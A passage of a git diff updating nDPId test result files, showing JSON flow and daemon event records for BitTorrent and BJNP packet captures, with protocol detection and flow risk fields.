+00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469967550,"flow_last_seen":1455469968002,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":871,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52887,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00839{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469974533,"flow_last_seen":1455469974889,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.57.97.83","src_port":52906,"dst_port":53137,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1455469969259,"flow_last_seen":1455469973374,"flow_idle_time":7560000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":582,"flow_tot_l4_payload_len":1030,"flow_avg_l4_payload_len":128,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52895,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469980213,"flow_last_seen":1455469981133,"flow_idle_time":7560000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1048,"flow_avg_l4_payload_len":209,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"83.216.184.241","src_port":52927,"dst_port":51413,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978422,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":520,"flow_tot_l4_payload_len":875,"flow_avg_l4_payload_len":175,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.237.193.34","src_port":52922,"dst_port":11321,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469975240,"flow_last_seen":1455469975394,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":348,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.72.255.163","src_port":52912,"dst_port":59928,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00840{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469970233,"flow_last_seen":1455469971153,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":527,"flow_tot_l4_payload_len":951,"flow_avg_l4_payload_len":190,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52897,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469975234,"flow_last_seen":1455469976169,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":534,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.26.95.30","src_port":52911,"dst_port":22673,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469978413,"flow_last_seen":1455469978679,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":521,"flow_tot_l4_payload_len":882,"flow_avg_l4_payload_len":176,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"95.234.159.16","src_port":52921,"dst_port":41205,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1455469980262,"flow_last_seen":1455469980488,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":732,"flow_avg_l4_payload_len":244,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.249.100","src_port":52926,"dst_port":31336,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469980275,"flow_last_seen":1455469980275,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"93.65.227.100","src_port":52925,"dst_port":19116,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469971675,"flow_last_seen":1455469973590,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":350,"flow_avg_l4_payload_len":87,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52902,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1455469976582,"flow_last_seen":1455469980118,"flow_idle_time":7560000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":584,"flow_tot_l4_payload_len":1088,"flow_avg_l4_payload_len":155,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"190.103.195.56","src_port":52914,"dst_port":46633,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469969441,"flow_last_seen":1455469969689,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":554,"flow_tot_l4_payload_len":850,"flow_avg_l4_payload_len":170,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52896,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975265,"flow_last_seen":1455469975265,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.53.228.2","src_port":52909,"dst_port":14627,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469970452,"flow_last_seen":1455469970452,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52893,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975622,"flow_last_seen":1455469975622,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"79.55.129.22","src_port":52908,"dst_port":12097,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1455469977229,"flow_last_seen":1455469977324,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":552,"flow_tot_l4_payload_len":896,"flow_avg_l4_payload_len":179,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"151.15.48.189","src_port":52917,"dst_port":47001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00841{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1455469971321,"flow_last_seen":1455469972136,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":535,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52903,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00849{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":210,"flow_first_seen":1455469976336,"flow_last_seen":1455469982106,"flow_idle_time":7560000,"flow_min_l4_payload_len":14,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":271267,"flow_avg_l4_payload_len":1291,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"198.100.146.9","src_port":52915,"dst_port":60163,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00840{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1455469967246,"flow_last_seen":1455469967465,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":558,"flow_tot_l4_payload_len":626,"flow_avg_l4_payload_len":313,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00843{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1455469974358,"flow_last_seen":1455469976244,"flow_idle_time":7560000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":639,"flow_tot_l4_payload_len":1137,"flow_avg_l4_payload_len":284,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52907,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469969441,"flow_last_seen":1455469969441,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52894,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} +00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1455469975407,"flow_last_seen":1455469975407,"flow_idle_time":7560000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469982106,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"120.62.33.241","src_port":52910,"dst_port":39332,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"BitTorrent","breed":"Acceptable","category":"Download"}} 00565{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":299,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":299,"packets-processed":299,"total-skipped-flows":0,"total-l4-data-len":285982,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":24,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":24,"total-idle-flows":24,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":134,"global_ts_msec":1455469982106} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 299/299 diff --git a/test/results/bjnp.pcap.out b/test/results/bjnp.pcap.out index 274cdd312..c99d800ea 100644 --- a/test/results/bjnp.pcap.out +++ b/test/results/bjnp.pcap.out @@ -1,38 +1,58 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bjnp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1467725378685} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725378685} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmDAAB5EfxOwKi5jcCoARHDpyGkABg0Q0JKTlACAQAAF6QAAAAAAADK6w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725383705} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":2,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmRAAB5EfxQwKi5jcCoAQHDqSGkABg0T0JKTlACAQAAF6YAAAAAAACF3A=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725383909} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":3,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmSAAB5EfxOwKi5jcCoAQLDqSGkABg0TUJKTlACAQAAF6cAAAAAAAAfDQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384113} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":4,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmTAAB5EfxMwKi5jcCoAQPDqSGkABg0S0JKTlACAQAAF6gAAAAAAACCRA=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384313} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":5,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmVAAB5EfxJwKi5jcCoAQTDqSGkABg0SUJKTlACAQAAF6kAAAAAAADs+w=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384517} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":6,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmWAAB5EfxHwKi5jcCoAQXDqSGkABg0R0JKTlACAQAAF6oAAAAAAADhdg=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384721} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":7,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmXAAB5EfxFwKi5jcCoAQbDqSGkABg0RUJKTlACAQAAF6sAAAAAAACzRQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725384921} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":8,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmYAAB5EfxDwKi5jcCoAQfDqSGkABg0Q0JKTlACAQAAF6wAAAAAAAC5aQ=="} -00170{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725385125} -00313{"packet_event_id":1,"packet_event_name":"packet","packet_id":9,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmaAAB5EfxAwKi5jcCoAQjDqSGkABg0QUJKTlACAQAAF60AAAAAAACvDw=="} -00171{"error_event_id":3,"error_event_name":"Unsupported datalink layer","datalink":12,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","global_ts_msec":1467725385329} -00314{"packet_event_id":1,"packet_event_name":"packet","packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":46,"pkt_type":0,"pkt_l3_offset":0,"pkt_l4_offset":0,"pkt_len":46,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"RQAALAmbAAB5Efw+wKi5jcCoAQnDqSGkABg0P0JKTlACAQAAF64AAAAAAABjbw=="} -00546{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":10,"source":"bjnp.pcap","alias":"nDPId-test","packets-captured":10,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":23,"global_ts_msec":1467725385329} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bjnp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467725378685,"flow_last_seen":1467725378685,"flow_idle_time":180000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1467725378685,"l3_proto":"ip4","src_ip":"192.168.185.141","dst_ip":"192.168.1.17","src_port":50087,"dst_port":8612,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 